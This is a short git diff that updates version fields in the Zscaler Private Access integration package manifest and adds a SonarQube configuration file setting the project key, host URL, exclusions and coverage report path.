--- a/packages/zscaler_zpa/manifest.yml
+++ b/packages/zscaler_zpa/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.3"
 name: zscaler_zpa
 title: Zscaler Private Access
-version: "1.16.1"
+version: "1.17.0"
 source:
 license: Elastic-2.0
 description: Collect logs from Zscaler Private Access (ZPA) with Elastic Agent.
diff --git a/sonar-project.properties b/sonar-project.properties
new file mode 100644
index 00000000000..0864085516b
--- /dev/null
+++ b/sonar-project.properties
@@ -0,0 +1,15 @@
+sonar.projectKey=elastic_integrations_AYu5LCaKQZlFqhqWIrk_
+sonar.host.url=https://sonar.elastic.dev
+sonar.sources=packages
+
+sonar.log.level=INFO
+sonar.sourceEncoding=UTF-8
+
+# Coverage report created by elastic-package just reference to *.yml files
+# Remove all these extensions to try to keep just *.yml files
+sonar.exclusions=**/*.java,**/*.json,**/Dockerfile,**/*.tf,**/*.go,**/*.yaml,**/*.xml,**/*.md,**/*.hbs,**/*.jsp
+
+# Generic test coverage report format
+# https://docs.sonarsource.com/sonarqube/latest/analyzing-source-code/test-coverage/generic-test-data/#generic-test-coverage
+sonar.coverageReportPaths=build/test-coverage/coverage_merged.xml
+